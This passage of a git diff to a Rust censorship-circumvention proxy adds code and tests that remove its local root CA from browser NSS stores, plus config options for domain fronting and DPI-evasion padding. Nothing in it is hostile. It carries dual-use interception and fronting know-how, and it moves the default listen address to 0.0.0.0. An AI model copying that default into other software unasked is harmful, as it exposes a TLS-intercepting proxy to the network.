bool; + #[cfg(target_os = "linux")] + { + chrome_present = chrome_nssdb_path() + .map(|p| p.join("cert9.db").exists() || p.join("cert8.db").exists()) + .unwrap_or(false); + } + #[cfg(not(target_os = "linux"))] + { + chrome_present = false; + } + let stores_present = !profiles.is_empty() || chrome_present; + if stores_present { + tracing::warn!( + "NSS certutil not found — cannot automatically remove CA from \ + Firefox/Chrome NSS stores. Remove `MasterHttpRelayVPN` manually \ + via each browser's certificate settings, or install NSS tools \ + (`libnss3-tools` on Debian/Ubuntu, `nss-tools` on Fedora/RHEL) \ + and re-run --remove-cert." + ); + } + return NssReport { + tried: 0, + ok: 0, + tool_missing_with_stores_present: stores_present, + }; + } + + let mut report = NssReport::default(); + + for p in firefox_profile_dirs() { + report.tried += 1; + if remove_nss_in_profile(&p) { + report.ok += 1; + } + } + + #[cfg(target_os = "linux")] + { + if let Some(nssdb) = chrome_nssdb_path() { + if nssdb.join("cert9.db").exists() || nssdb.join("cert8.db").exists() { + report.tried += 1; + let dir_arg = format!("sql:{}", nssdb.display()); + if remove_nss_in_dir(&dir_arg) { + report.ok += 1; + tracing::info!( + "Removed CA from Chrome/Chromium NSS DB: {}", + nssdb.display() + ); + } + } + } + } + + if report.tried > 0 { + if report.ok == report.tried { + tracing::info!("Removed CA from {} NSS store(s).", report.ok); + } else { + tracing::warn!( + "NSS cleanup partial: {}/{} stores updated. If Firefox/Chrome \ + was running, close it and re-run --remove-cert. Otherwise \ + remove `MasterHttpRelayVPN` manually via each browser's cert \ + settings.", + report.ok, + report.tried + ); + } + } + report +} + +/// Best-effort remove our cert from one NSS DB. +/// +/// Idempotent contract: "cert was never in this DB" is success. +/// Critical distinction from probe *failure*: if `certutil -L` fails +/// because the DB is locked by a running Firefox/Chrome, corrupt, or +/// inaccessible, we must NOT return `true` — that would silently mask +/// an incomplete revocation the user can't see, and NSS would keep +/// trusting the stale root. We parse stderr: only the specific +/// "could not find cert" message means absent. +fn remove_nss_in_dir(dir_arg: &str) -> bool { + let list = Command::new("certutil") + .args(["-L", "-n", CERT_NAME, "-d", dir_arg]) + .output(); + match list { + Ok(o) if o.status.success() => { + // Cert is present — fall through to delete. + } + Ok(o) => { + let stderr = String::from_utf8_lossy(&o.stderr); + if is_nss_not_found(&stderr) { + tracing::debug!("NSS {}: no `{}` entry — already clean", dir_arg, CERT_NAME); + return true; + } + tracing::warn!( + "NSS {}: probe failed (DB locked / inaccessible / other error): {}", + dir_arg, + stderr.trim() + ); + return false; + } + Err(e) => { + tracing::warn!("NSS {}: probe exec failed: {}", dir_arg, e); + return false; + } + } + + let res = Command::new("certutil") + .args(["-D", "-n", CERT_NAME, "-d", dir_arg]) + .output(); + match res { + Ok(o) if o.status.success() => true, + Ok(o) => { + tracing::warn!( + "NSS {}: delete failed: {}", + dir_arg, + String::from_utf8_lossy(&o.stderr).trim() + ); + false + } + Err(e) => { + tracing::warn!("NSS {}: delete exec failed: {}", dir_arg, e); + false + } + } +} + +/// Classify NSS `certutil` stderr as "nickname not present" (idempotent +/// success signal) vs any other failure mode (DB locked, DB corrupt, +/// permission, etc.). Exposed for unit testing. Matches only the +/// specific not-found messages NSS emits — anything else is treated as +/// a real failure so silent bugs can't hide behind false positives. +fn is_nss_not_found(stderr: &str) -> bool { + let s = stderr.to_ascii_lowercase(); + s.contains("could not find cert") || s.contains("could not find a certificate") +} + +fn remove_nss_in_profile(profile: &Path) -> bool { + let prefix = if profile.join("cert9.db").exists() { + "sql:" + } else if profile.join("cert8.db").exists() { + "" + } else { + return false; + }; + let dir_arg = format!("{}{}", prefix, profile.display()); + remove_nss_in_dir(&dir_arg) +} + +/// Undo `enable_firefox_enterprise_roots`: for each profile, strip the +/// marker+pref block if (and only if) we wrote it. If the user owns +/// their own `enterprise_roots` pref — indicated by the absence of our +/// marker line — leave user.js alone entirely. +fn disable_firefox_enterprise_roots() { + for profile in firefox_profile_dirs() { + let user_js = profile.join("user.js"); + let Ok(existing) = std::fs::read_to_string(&user_js) else { + continue; + }; + if let Some(new) = strip_enterprise_roots_block(&existing) { + let _ = std::fs::write(&user_js, new); + continue; + } + // No marker block to strip, but an orphan pref is present. + // Surface it so the user isn't left wondering why user.js + // still has an enterprise_roots line after --remove-cert. + // The orphan is harmless (Firefox falls back to its built-in + // root store once the CA leaves the OS store), but silent + // leftovers feel like half-done removals. + if has_bare_enterprise_roots(&existing) { + tracing::info!( + "Firefox profile {}: `security.enterprise_roots.enabled` pref \ + present without our marker — left in place. If it was written \ + by a pre-v1.2.13 install it's a cosmetic orphan (harmless, \ + Firefox falls back to its built-in root store); remove it \ + manually from user.js if it bothers you. If you set it \ + yourself, leave it.", + profile.display() + ); + } + } +} + fn firefox_profile_dirs() -> Vec { use std::path::PathBuf; let mut roots: Vec = Vec::new(); @@ -579,7 +1383,10 @@ fn firefox_profile_dirs() -> Vec { } "windows" => { if let Ok(appdata) = std::env::var("APPDATA") { - roots.push(PathBuf::from(format!("{}\\Mozilla\\Firefox\\Profiles", appdata))); + roots.push(PathBuf::from(format!( + "{}\\Mozilla\\Firefox\\Profiles", + appdata + ))); } } _ => {} @@ -689,4 +1496,308 @@ ID_LIKE=debian let content = "SOMEFIELD=maybearchived\nFOO=bar\n"; assert_eq!(classify_os_release(content), "unknown"); } + + // ── Firefox user.js block install / uninstall ── + + #[test] + fn enterprise_roots_block_added_to_empty_userjs() { + let got = add_enterprise_roots_block(""); + let expected = format!("{}\n{}\n", FX_MARKER, FX_PREF); + assert_eq!(got, EnterpriseRootsEdit::AddedBlock(expected)); + } + + #[test] + fn enterprise_roots_block_appended_preserving_existing_prefs() { + let existing = "user_pref(\"some.other\", 1);\n"; + let got = add_enterprise_roots_block(existing); + let expected = format!( + "user_pref(\"some.other\", 1);\n{}\n{}\n", + FX_MARKER, FX_PREF + ); + assert_eq!(got, EnterpriseRootsEdit::AddedBlock(expected)); + } + + #[test] + fn enterprise_roots_block_is_idempotent_when_marker_present() { + let existing = format!( + "user_pref(\"a\", 1);\n{}\n{}\nuser_pref(\"b\", 2);\n", + FX_MARKER, FX_PREF + ); + assert_eq!( + add_enterprise_roots_block(&existing), + EnterpriseRootsEdit::AlreadyOurs + ); + } + + #[test] + fn enterprise_roots_block_respects_user_owned_pref_without_marker() { + // User has enterprise_roots set themselves — no marker above it. + // We must NOT write our line, and we must NOT claim ownership on + // uninstall (tested separately below). + let existing = "user_pref(\"security.enterprise_roots.enabled\", true);\n"; + assert_eq!( + add_enterprise_roots_block(existing), + EnterpriseRootsEdit::UserOwned + ); + } + + #[test] + fn enterprise_roots_block_respects_user_owned_pref_set_to_false() { + // User explicitly disabled it — also a user-owned pref, leave alone. + let existing = "user_pref(\"security.enterprise_roots.enabled\", false);\n"; + assert_eq!( + add_enterprise_roots_block(existing), + EnterpriseRootsEdit::UserOwned + ); + } + + #[test] + fn strip_enterprise_roots_removes_our_block_and_preserves_others() { + let before = format!( + "user_pref(\"a\", 1);\n{}\n{}\nuser_pref(\"b\", 2);\n", + FX_MARKER, FX_PREF + ); + let after = strip_enterprise_roots_block(&before).expect("should strip"); + assert_eq!(after, "user_pref(\"a\", 1);\nuser_pref(\"b\", 2);\n"); + } + + #[test] + fn strip_enterprise_roots_refuses_when_pref_is_bare() { + // No marker above — indistinguishable from a user- or + // enterprise-policy-authored line. Must return None so caller + // leaves user.js untouched. Legacy upgrade users get one + // cosmetic orphan line; revoking user-owned Firefox trust + // behavior silently is worse. + let before = "user_pref(\"security.enterprise_roots.enabled\", true);\n"; + assert_eq!(strip_enterprise_roots_block(before), None); + } + + #[test] + fn strip_enterprise_roots_refuses_when_marker_is_elsewhere() { + // Marker present but not directly above the pref — user may + // have copied our marker line as a comment somewhere else. We + // still can't prove ownership of the pref itself, so leave + // alone. + let before = format!( + "{}\nuser_pref(\"unrelated\", 1);\n\ + user_pref(\"security.enterprise_roots.enabled\", true);\n", + FX_MARKER + ); + assert_eq!(strip_enterprise_roots_block(&before), None); + } + + #[test] + fn strip_enterprise_roots_leaves_user_false_pref_alone() { + let before = "user_pref(\"security.enterprise_roots.enabled\", false);\n"; + assert_eq!(strip_enterprise_roots_block(before), None); + } + + #[test] + fn strip_enterprise_roots_returns_none_when_pref_absent() { + let before = "user_pref(\"other\", 1);\nuser_pref(\"another\", 2);\n"; + assert_eq!(strip_enterprise_roots_block(before), None); + } + + #[test] + fn strip_enterprise_roots_roundtrip_from_empty() { + // add_block("") -> strip_block(added) -> "" (no trailing garbage). + let added = match add_enterprise_roots_block("") { + EnterpriseRootsEdit::AddedBlock(s) => s, + other => panic!("unexpected: {:?}", other), + }; + let stripped = strip_enterprise_roots_block(&added).expect("should strip"); + assert_eq!(stripped, ""); + } + + // ── has_bare_enterprise_roots ── + + #[test] + fn bare_enterprise_roots_detected_when_no_marker_present() { + let content = "user_pref(\"security.enterprise_roots.enabled\", true);\n"; + assert!(has_bare_enterprise_roots(content)); + } + + #[test] + fn bare_enterprise_roots_not_detected_when_marker_block_present() { + // Our marker+pref block — strip handles this; has_bare_ must + // return false so we don't double-warn about a line we own. + let content = format!("{}\n{}\n", FX_MARKER, FX_PREF); + assert!(!has_bare_enterprise_roots(&content)); + } + + #[test] + fn bare_enterprise_roots_not_detected_when_pref_absent() { + let content = "user_pref(\"other\", 1);\n"; + assert!(!has_bare_enterprise_roots(content)); + } + + #[test] + fn bare_enterprise_roots_ignores_false_variant() { + // User explicitly set enterprise_roots = false — not our line + // and not the pre-marker legacy write (which only ever wrote + // true). No orphan to warn about. + let content = "user_pref(\"security.enterprise_roots.enabled\", false);\n"; + assert!(!has_bare_enterprise_roots(content)); + } + + // ── should_reconcile_for ── + + #[test] + fn reconcile_skipped_for_normal_user() { + // euid != 0 — even with SUDO_USER set we must NOT re-root HOME. + // A non-root process that happened to inherit SUDO_USER (or + // used `sudo -E`) shouldn't get to redirect cert paths. + assert_eq!(should_reconcile_for(1000, Some("alice")), None); + assert_eq!(should_reconcile_for(1000, None), None); + } + + #[test] + fn reconcile_skipped_for_real_root_login_without_sudo() { + // Load-bearing case the maintainer asked to pin: euid == 0 + // AND no SUDO_USER means the process is a real root login, + // not a sudo elevation. HOME should stay as /root; we must + // not try to resolve some other user's home. + assert_eq!(should_reconcile_for(0, None), None); + } + + #[test] + fn reconcile_skipped_when_sudo_user_is_empty_or_root() { + assert_eq!(should_reconcile_for(0, Some("")), None); + assert_eq!(should_reconcile_for(0, Some("root")), None); + } + + #[test] + fn reconcile_triggers_for_real_sudo_invocation() { + // euid == 0 AND SUDO_USER points to a non-root user — this is + // the sudo case we do want to reconcile. + assert_eq!(should_reconcile_for(0, Some("alice")), Some("alice")); + } + + // ── sudo_parse_passwd_home ── + + #[test] + fn parses_debian_passwd_entry() { + let line = "liyon:x:1000:1000:Liyon,,,:/home/liyon:/bin/bash\n"; + assert_eq!(sudo_parse_passwd_home(line), Some("/home/liyon".into())); + } + + #[test] + fn macos_passwd_format_does_not_parse_and_falls_back_to_convention() { + // macOS `dscl`-sourced passwd lines have extra fields + // (pw_class, chg, exp) before home, so index 5 lands on a + // non-home field. sudo_parse_passwd_home is intentionally + // Linux-shaped — the macOS path relies on the `/Users/` + // convention in `unix::resolve_home` rather than on this + // parser. This test pins that contract. + let line = "liyon:*:501:20::0:0:Liyon Bonakdar:/Users/liyon:/bin/zsh"; + assert_ne!(sudo_parse_passwd_home(line), Some("/Users/liyon".into())); + } + + #[test] + fn rejects_malformed_passwd_line_too_few_fields() { + let line = "liyon:x:1000:1000\n"; + assert_eq!(sudo_parse_passwd_home(line), None); + } + + #[test] + fn rejects_empty_home_field() { + let line = "svcacct:x:999:999:gecos::/bin/false\n"; + assert_eq!(sudo_parse_passwd_home(line), None); + } + + #[test] + fn returns_first_matching_line_when_multiple() { + // getent only prints one line, but guard against future change. + let content = "liyon:x:1000:1000::/home/liyon:/bin/bash\n\ + other:x:1001:1001::/home/other:/bin/bash\n"; + assert_eq!(sudo_parse_passwd_home(content), Some("/home/liyon".into())); + } + + // ── NssReport::is_clean ── + + #[test] + fn nss_report_is_clean_when_nothing_tried() { + let r = NssReport::default(); + assert!(r.is_clean()); + } + + #[test] + fn nss_report_is_clean_when_all_attempts_succeeded() { + let r = NssReport { + tried: 3, + ok: 3, + tool_missing_with_stores_present: false, + }; + assert!(r.is_clean()); + } + + #[test] + fn nss_report_not_clean_on_partial_failure() { + let r = NssReport { + tried: 3, + ok: 2, + tool_missing_with_stores_present: false, + }; + assert!(!r.is_clean()); + } + + #[test] + fn nss_report_not_clean_when_tool_missing_with_stores() { + // Even with tried=0 (we couldn't try anything), the presence + // of NSS stores plus a missing tool means cleanup is NOT + // complete — callers should flag this to the user. + let r = NssReport { + tried: 0, + ok: 0, + tool_missing_with_stores_present: true, + }; + assert!(!r.is_clean()); + } + + // ── is_nss_not_found ── + + #[test] + fn nss_not_found_classifies_standard_not_found_message() { + // Typical NSS certutil output when the nickname is absent. + let stderr = "certutil: Could not find cert: MasterHttpRelayVPN\n"; + assert!(is_nss_not_found(stderr)); + } + + #[test] + fn nss_not_found_classifies_alt_wording_some_versions_emit() { + let stderr = "certutil: could not find a certificate named 'MasterHttpRelayVPN'\n"; + assert!(is_nss_not_found(stderr)); + } + + #[test] + fn nss_not_found_rejects_locked_database_error() { + // Regression guard for the critical bug: DB locked (Firefox + // running) must NOT be treated as "cert absent" — that would + // silently report clean revocation while NSS keeps trusting + // the stale root. + let stderr = "certutil: function failed: SEC_ERROR_LOCKED_DATABASE: \ + the certificate/key database is locked.\n"; + assert!(!is_nss_not_found(stderr)); + } + + #[test] + fn nss_not_found_rejects_bad_database_error() { + let stderr = "certutil: function failed: SEC_ERROR_BAD_DATABASE: \ + security library: bad database.\n"; + assert!(!is_nss_not_found(stderr)); + } + + #[test] + fn nss_not_found_rejects_permission_error() { + let stderr = "certutil: unable to open \"sql:/home/x/.mozilla/firefox/profile\" \ + (Permission denied)\n"; + assert!(!is_nss_not_found(stderr)); + } + + #[test] + fn nss_not_found_rejects_empty_stderr() { + // An empty stderr with a non-zero exit is ambiguous — safer + // to classify as "not found is NOT proven", i.e. failure. + assert!(!is_nss_not_found("")); + } } diff --git a/src/config.rs b/src/config.rs index 74d08155..e2dd10c3 100644 --- a/src/config.rs +++ b/src/config.rs @@ -1,4 +1,5 @@ -use serde::Deserialize; +use rustls::pki_types::ServerName; +use serde::{Deserialize, Serialize}; use std::collections::HashMap; use std::path::Path; @@ -14,14 +15,19 @@ pub enum ConfigError { /// Operating mode. `AppsScript` is the full client — MITMs TLS locally and /// relays HTTP/HTTPS through a user-deployed Apps Script endpoint. -/// `GoogleOnly` is a bootstrap: no relay, no Apps Script config needed, -/// only the SNI-rewrite tunnel to the Google edge is active. Intended for -/// users who need to reach `script.google.com` to deploy `Code.gs` in the -/// first place. +/// `Direct` runs without any Apps Script relay: only the SNI-rewrite tunnel +/// is active, targeting the Google edge by default plus any user-configured +/// `fronting_groups`. Originally introduced as a `script.google.com` +/// bootstrap (when this mode could only reach Google's edge it was named +/// `google_only`), now generalized to any user-configured CDN edge. #[derive(Debug, Clone, Copy, PartialEq, Eq)] pub enum Mode { AppsScript, - GoogleOnly, + /// Was named `GoogleOnly` before v1.9 and the introduction of + /// `fronting_groups`. The string `"google_only"` is still accepted + /// in `mode_kind()` as a deprecated alias so existing configs do + /// not break. + Direct, Full, } @@ -29,7 +35,7 @@ impl Mode { pub fn as_str(self) -> &'static str { match self { Mode::AppsScript => "apps_script", - Mode::GoogleOnly => "google_only", + Mode::Direct => "direct", Mode::Full => "full", } } @@ -96,6 +102,14 @@ pub struct Config { /// script IDs. #[serde(default)] pub parallel_relay: u8, + /// Adaptive batch coalesce: after each op arrives, wait this many ms + /// for more ops before firing the batch. Resets on every arrival. + /// 0 = use compiled default (40ms). + #[serde(default)] + pub coalesce_step_ms: u16, + /// Hard cap on total coalesce wait (ms). 0 = use compiled default (1000ms). + #[serde(default)] + pub coalesce_max_ms: u16, /// Optional explicit SNI rotation pool for outbound TLS to `google_ip`. /// Empty / missing = auto-expand from `front_domain` (current default of /// {www, mail, drive, docs, calendar}.google.com). Set to an explicit list @@ -163,6 +177,197 @@ pub struct Config { /// Issues #39, #127. #[serde(default)] pub passthrough_hosts: Vec, + + /// Block outbound QUIC (UDP/443) at the SOCKS5 listener. + /// + /// QUIC is HTTP/3-over-UDP. In `apps_script` mode it's hopeless — + /// Apps Script is HTTP-only, so QUIC datagrams either get refused + /// outright (UDP ASSOCIATE rejected) or silently fall through to + /// `raw-tcp direct` and fail in interesting ways. In `full` mode + /// the tunnel-node CAN carry UDP, but QUIC's congestion control + /// stacked on top of TCP-encapsulated transport produces TCP + /// meltdown for any non-trivial bandwidth — browsers see <1 Mbps + /// where the same site over plain HTTPS would do >50. + /// + /// With `block_quic = true`, the SOCKS5 UDP relay drops any + /// datagram destined for port 443 (silent UDP — caller's stack + /// retries a few times then falls back). Browsers then re-issue + /// the same request as TCP/HTTPS through the regular CONNECT + /// path, which goes through the relay normally. + /// + /// Why this is opt-in rather than always-on: for users on Full + /// mode + udpgw (a recent path; v1.7.0+) the QUIC TCP-meltdown + /// is partially mitigated by udpgw's persistent-socket reuse, + /// and a tiny minority of sites only support HTTP/3 (rare). The + /// flag lets users who care about consistency over peak speed + /// opt out of QUIC at the source rather than discovering its + /// failure modes later. Issue #213. + #[serde(default)] + pub block_quic: bool, + /// When true, suppress the random `_pad` field that v1.8.0+ adds + /// to outbound Apps Script requests for DPI evasion. Default off + /// (padding active). Some users on heavily-throttled ISPs find + /// the +25% bandwidth cost from padding compounds with the + /// throttle to push borderline-working batches into timeouts; + /// turning padding off recovers a bit of headroom at the cost of + /// length-distribution defense against DPI fingerprinting. Issue + /// #391 (EBRAHIM-AM). + /// + /// Don't flip this on speculatively — for users where Apps Script + /// outbound is uncongested, padding is free DPI defense. Only + /// turn off if you've measured throughput improvement after the + /// flip on your specific ISP path. + #[serde(default)] + pub disable_padding: bool, + + /// Opt-out for the DoH bypass. Default `false` (= bypass active): + /// CONNECTs to well-known DoH hostnames (Cloudflare, Google, Quad9, + /// AdGuard, NextDNS, OpenDNS, browser-pinned variants like + /// `chrome.cloudflare-dns.com` and `mozilla.cloudflare-dns.com`) + /// skip the Apps Script tunnel and exit via plain TCP (or + /// `upstream_socks5` if set). DoH already encrypts the queries + /// themselves, so the only privacy property the tunnel was adding + /// is hiding *the fact that you're doing DoH* from the local + /// network — a marginal gain not worth the ~2 s Apps Script + /// round-trip cost paid on every name lookup. In Full mode this + /// was the dominant DNS slowdown source. + /// + /// Set `tunnel_doh: false` to enable the bypass and let DoH go + /// direct (saves the ~2 s Apps Script round-trip per name on + /// networks where the DoH endpoints are reachable). With the + /// bypass off, browsers that find their pinned DoH host + /// unreachable already fall back to OS DNS on their own, so + /// failure modes are graceful in either direction. + /// + /// **Default flipped to `true` in v1.9.0** (issue #468). The + /// previous default (`false` = bypass active) silently broke for + /// Iranian users because Iran ISPs filter direct connections to + /// `dns.google`, `chrome.cloudflare-dns.com`, etc. — exactly the + /// "pinned DoH" hosts that the bypass was sending through. The + /// safe default keeps DoH inside the tunnel; users on networks + /// where direct DoH works can opt back into the bypass. + /// + /// Port-gated to TCP/443 only. A private DoH on a non-standard port + /// (e.g. `doh.internal.example:8443`) won't take the bypass path — + /// list it in `passthrough_hosts` instead, which has no port gate. + #[serde(default = "default_tunnel_doh")] + pub tunnel_doh: bool, + + /// Extra hostnames to treat as DoH endpoints in addition to the + /// built-in default list. Case-insensitive; entries match exactly + /// OR as a dot-anchored suffix unconditionally — `doh.acme.test` + /// covers both `doh.acme.test` and `tenant.doh.acme.test`. (Unlike + /// `passthrough_hosts`, no leading dot is required for suffix + /// matching: every legitimate subdomain of a DoH host is itself + /// a DoH endpoint, so the leading-dot convention would be a + /// footgun.) Use this to cover private/enterprise DoH resolvers + /// without waiting for a release. + /// + /// Inert when `tunnel_doh = true` — the bypass itself is off, so + /// the extras have nothing to feed. The proxy logs a warning at + /// startup if both are set together. + #[serde(default)] + pub bypass_doh_hosts: Vec, + + /// Multi-edge domain-fronting groups. Each group is a triple of + /// (edge IP, front SNI, member domains): when a CONNECT to one of + /// the member domains arrives, the proxy MITMs at the local CA + /// then re-encrypts upstream against `ip` with `sni` as the TLS + /// SNI — same trick we already do for `google_ip` + `front_domain`, + /// but generalised so users can target Vercel's edge (sni=react.dev, + /// fronting vercel.com / vercel.app / nextjs.org / ...) or Fastly's + /// (sni=www.python.org, fronting reddit.com / githubassets.com / ...) + /// directly without burning Apps Script quota or relying on the + /// Google edge for non-Google traffic. + /// + /// The cert returned by the upstream is validated against `sni` by + /// rustls as normal — no custom SAN-allowlist needed, the front SNI + /// must itself be a real domain hosted by the same edge as the + /// targets. Picking the right (ip, sni) pair is on the user; see + /// `docs/fronting-groups.md` for the recipe. + /// + /// Group match wins over the built-in Google SNI-rewrite suffix list + /// but loses to `passthrough_hosts` (explicit user opt-out wins) and + /// to the DoH bypass. Empty / missing = feature off. + #[serde(default)] + pub fronting_groups: Vec, + + /// Auto-blacklist tuning — how many timeouts within the window + /// trip a per-deployment cooldown. + /// + /// Default `3` matches the historical behavior. Single-deployment + /// users who hit transient network blips have reported (#391, #444) + /// that 3 strikes are too few — one cold-start stall plus two + /// network glitches lock out their only relay path. Bumping to + /// `5` or `6` is a reasonable workaround for that case. + /// + /// Multi-deployment users with 10+ healthy alternatives can lower + /// this (e.g. `2`) to fail-fast off a flaky deployment without + /// burning latency on retries. + #[serde(default = "default_auto_blacklist_strikes")] + pub auto_blacklist_strikes: u32, + + /// Window (seconds) for the auto-blacklist strike counter. Strikes + /// older than this are dropped. Default `30`. Larger windows make + /// the heuristic less twitchy at the cost of holding state longer + /// for deployments that have already recovered. + #[serde(default = "default_auto_blacklist_window_secs")] + pub auto_blacklist_window_secs: u64, + + /// Cooldown (seconds) when the strike threshold trips. Default + /// `120`. Single-deployment users who can't afford a 2-min lockout + /// when their only relay misbehaves can drop to `30` or `60`. Multi- + /// deployment users with healthy alternatives can extend to `600` + /// to keep a known-bad deployment out of rotation longer. + #[serde(default = "default_auto_blacklist_cooldown_secs")] + pub auto_blacklist_cooldown_secs: u64, + + /// Per-batch HTTP round-trip timeout (seconds). Default `30` — + /// matches Apps Script's typical response cliff and historical + /// `BATCH_TIMEOUT` constant. Slow Iran ISP networks may want `45` + /// or `60` to give Apps Script time to respond past throttle + /// windows. Networks with fail-fast preference may want `15` to + /// retry sooner when a deployment hangs. Floor `5`, ceiling `300` + /// (anything beyond exceeds Apps Script's hard 6-min cap with + /// no benefit). + #[serde(default = "default_request_timeout_secs")] + pub request_timeout_secs: u64, +} + +/// One multi-edge fronting group. Edge CDNs like Vercel and Fastly +/// host hundreds of tenants behind a single set of edge IPs and use +/// the inner HTTP `Host` header (after TLS handshake) to dispatch to +/// the right backend. Pick one neutral domain hosted on the same edge +/// as `sni`; the cert it serves will be valid for that name (rustls +/// validates against `sni`, not against the inner `Host`), and the +/// edge will route based on the `Host` header. +#[derive(Debug, Clone, Deserialize, Serialize)] +pub struct FrontingGroup { + /// Human-readable name used in log lines. Free-form; uniqueness not + /// enforced but recommended. + pub name: String, + /// Edge IP to dial. A single IP for now — most edges have many but + /// one is enough to validate the technique. IP rotation per-group + /// can come later. + pub ip: String, + /// SNI to send on the outbound TLS handshake. Must be a real domain + /// served by the same edge as `domains`, otherwise the edge will + /// either refuse the handshake or serve a default page that 404s + /// the inner Host. Examples: `react.dev` for Vercel, `www.python.org` + /// for Fastly. + pub sni: String, + /// Member domain list. Matching is case-insensitive: an entry + /// matches the host exactly OR as an unconditional dot-anchored + /// suffix (`vercel.com` matches `app.vercel.com` too). Same shape + /// as the DoH host list. + /// + /// Canonical form for matching is lowercase and trailing-dot + /// trimmed; entries are normalized to that form once at proxy + /// startup. The on-disk representation is preserved as written + /// (we don't mutate the user's config), so `Vercel.com.` and + /// `vercel.com` both work — the matcher is the source of truth + /// for equality. + pub domains: Vec, } fn default_fetch_ips_from_api() -> bool { false } @@ -170,6 +375,24 @@ fn default_max_ips_to_scan() -> usize { 100 } fn default_scan_batch_size() -> usize {500} fn default_google_ip_validation() -> bool {true} +/// Default for `tunnel_doh`: `true` (DoH stays inside the tunnel). +/// Flipped from `false` in v1.9.0 per #468 — Iran ISPs filter direct +/// connections to pinned DoH hosts (`dns.google`, `chrome.cloudflare-dns.com`, +/// …) and the prior bypass-on default silently broke DNS for the +/// dominant userbase. Users on networks where direct DoH works can +/// opt back in with `tunnel_doh: false`. +fn default_tunnel_doh() -> bool { true } + +/// Defaults for the auto-blacklist tuning knobs (#391, #444). These +/// preserve historical behavior — `3 strikes / 30s window / 120s cooldown`. +fn default_auto_blacklist_strikes() -> u32 { 3 } +fn default_auto_blacklist_window_secs() -> u64 { 30 } +fn default_auto_blacklist_cooldown_secs() -> u64 { 120 } + +/// Default for `request_timeout_secs`: 30s, matching the historical +/// hard-coded `BATCH_TIMEOUT` and Apps Script's typical response cliff. +fn default_request_timeout_secs() -> u64 { 30 } + fn default_google_ip() -> String { "216.239.38.120".into() } @@ -177,7 +400,7 @@ fn default_front_domain() -> String { "www.google.com".into() } fn default_listen_host() -> String { - "127.0.0.1".into() + "0.0.0.0".into() } fn default_listen_port() -> u16 { 8085 @@ -226,9 +449,52 @@ impl Config { )); } if self.socks5_port == Some(self.listen_port) { - return Err(ConfigError::Invalid( - "listen_port and socks5_port must be different".into(), - )); + return Err(ConfigError::Invalid(format!( + "listen_port and socks5_port must differ on the same host \ + (both set to {} on {}). Change one of them in config.json.", + self.listen_port, self.listen_host + ))); + } + for (i, g) in self.fronting_groups.iter().enumerate() { + if g.name.trim().is_empty() { + return Err(ConfigError::Invalid(format!( + "fronting_groups[{}]: name is empty", i + ))); + } + if g.ip.trim().is_empty() { + return Err(ConfigError::Invalid(format!( + "fronting_groups[{}] ('{}'): ip is empty", i, g.name + ))); + } + if g.sni.trim().is_empty() { + return Err(ConfigError::Invalid(format!( + "fronting_groups[{}] ('{}'): sni is empty", i, g.name + ))); + } + // Parse the SNI here so an invalid hostname fails the same + // load path the UI / `mhrv-rs` CLI both use, rather than + // surfacing later only when ProxyServer::new tries to build + // the TLS server name. Same fail-fast contract as the rest + // of validate(). The parse is cheap; runtime path repeats + // it once at proxy startup, idempotently. + if let Err(e) = ServerName::try_from(g.sni.clone()) { + return Err(ConfigError::Invalid(format!( + "fronting_groups[{}] ('{}'): invalid sni '{}': {}", + i, g.name, g.sni, e + ))); + } + if g.domains.is_empty() { + return Err(ConfigError::Invalid(format!( + "fronting_groups[{}] ('{}'): domains list is empty", i, g.name + ))); + } + for d in &g.domains { + if d.trim().is_empty() { + return Err(ConfigError::Invalid(format!( + "fronting_groups[{}] ('{}'): empty domain entry", i, g.name + ))); + } + } } Ok(()) } @@ -236,10 +502,15 @@ impl Config { pub fn mode_kind(&self) -> Result { match self.mode.as_str() { "apps_script" => Ok(Mode::AppsScript), - "google_only" => Ok(Mode::GoogleOnly), + "direct" => Ok(Mode::Direct), + // Deprecated alias. `google_only` was the name of `direct` + // before fronting_groups generalized the mode beyond + // Google's edge. Accepted forever so old configs keep + // working — the UI rewrites it on next save. + "google_only" => Ok(Mode::Direct), "full" => Ok(Mode::Full), other => Err(ConfigError::Invalid(format!( - "unknown mode '{}' (expected 'apps_script', 'google_only', or 'full')", + "unknown mode '{}' (expected 'apps_script', 'direct', or 'full')", other ))), } @@ -306,24 +577,36 @@ mod tests { } #[test] - fn parses_google_only_without_script_id() { - // Bootstrap mode: no script_id, no auth_key — both are only meaningful + fn parses_direct_without_script_id() { + // Direct mode: no script_id, no auth_key — both are only meaningful // once the Apps Script relay exists. + let s = r#"{ + "mode": "direct" + }"#; + let cfg: Config = serde_json::from_str(s).unwrap(); + cfg.validate().expect("direct must validate without script_id / auth_key"); + assert_eq!(cfg.mode_kind().unwrap(), Mode::Direct); + } + + #[test] + fn google_only_alias_parses_as_direct() { + // Backwards compat: `direct` was named `google_only` before + // fronting_groups. Existing configs must continue to load. let s = r#"{ "mode": "google_only" }"#; let cfg: Config = serde_json::from_str(s).unwrap(); - cfg.validate().expect("google_only must validate without script_id / auth_key"); - assert_eq!(cfg.mode_kind().unwrap(), Mode::GoogleOnly); + cfg.validate().expect("google_only alias must still validate"); + assert_eq!(cfg.mode_kind().unwrap(), Mode::Direct); } #[test] - fn google_only_ignores_placeholder_script_id() { + fn direct_ignores_placeholder_script_id() { // UI round-trip: user saved config in apps_script with the placeholder, - // then switched mode to google_only. The placeholder should not block - // validation in the bootstrap mode. + // then switched mode to direct. The placeholder should not block + // validation in the no-relay mode. let s = r#"{ - "mode": "google_only", + "mode": "direct", "script_id": "YOUR_APPS_SCRIPT_DEPLOYMENT_ID" }"#; let cfg: Config = serde_json::from_str(s).unwrap(); @@ -375,6 +658,68 @@ mod tests { assert!(cfg.validate().is_err()); } + #[test] + fn fronting_groups_parse_and_validate() { + let s = r#"{ + "mode": "direct", + "fronting_groups": [ + { + "name": "vercel", + "ip": "76.76.21.21", + "sni": "react.dev", + "domains": ["vercel.com", "nextjs.org"] + } + ] + }"#; + let cfg: Config = serde_json::from_str(s).unwrap(); + cfg.validate().unwrap(); + assert_eq!(cfg.fronting_groups.len(), 1); + assert_eq!(cfg.fronting_groups[0].name, "vercel"); + assert_eq!(cfg.fronting_groups[0].domains.len(), 2); + } + + #[test] + fn fronting_group_rejects_invalid_sni_at_validate() { + // SNI must parse as a DNS hostname at the same fail-fast point + // as the rest of validate(), not later at proxy-startup time. + // The CLI and UI both run validate() on Save / before serve. + let s = r#"{ + "mode": "direct", + "fronting_groups": [{ + "name": "bad", + "ip": "1.2.3.4", + "sni": "not a valid hostname", + "domains": ["x.com"] + }] + }"#; + let cfg: Config = serde_json::from_str(s).unwrap(); + let err = 